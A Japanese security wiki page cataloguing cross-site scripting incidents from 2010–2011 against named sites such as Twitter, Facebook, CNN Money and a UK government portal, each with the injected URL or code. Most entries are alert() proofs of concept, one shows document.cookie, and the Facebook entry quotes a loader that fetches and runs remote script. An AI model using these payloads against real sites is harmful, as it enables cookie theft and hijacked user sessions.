XSS攻撃パターン

• Twitter (Monday, May 16, 2011, http://feedproxy.google.com/~r/security-shell/~3/t4yC97AbTaw/twitter-xss.html)

http://support.twitter.com/forms/render_account_partial?account_num='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E

• Mitel's AWC (Mitel Audio and Web Conferencing) (21st July 2010, http://www.securityfocus.com/archive/1/518022)

https://target-domain.foo/wd/wdinvite.asp?SID='><script>alert(1)</script>

• Facebook (May 13, 2011, http://www.reddit.com/r/netsec/comments/h9ke3/facebook_being_hit_by_an_xss/)

The offending code I saw on the "Remove This App" button:

javascript:(function(){ccscr=document.createElement('script');ccscr.type='text/javascript';ccscr.src='http://dl.dropbox.com/u/10505629/verify.js?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(ccscr);})();

The dropbox page has been removed.

• hackernews.com (27/04/2011, www.hackernews.com)

http://www.hackernews.com/?tag=wells-fargo&instance=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%293C/script%3E

• reporting.direct.gov.uk (12/04/2011)

https://reporting.direct.gov.uk/status.php?ref_id=<script>alert(document.cookie)</script>

• cgi.money.cnn.com (12/04/2011)

http://cgi.money.cnn.com/tools/fortune/compare_2009.jsp?id=%22%3E%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E

リンク

• security sub Wiki のトップページへ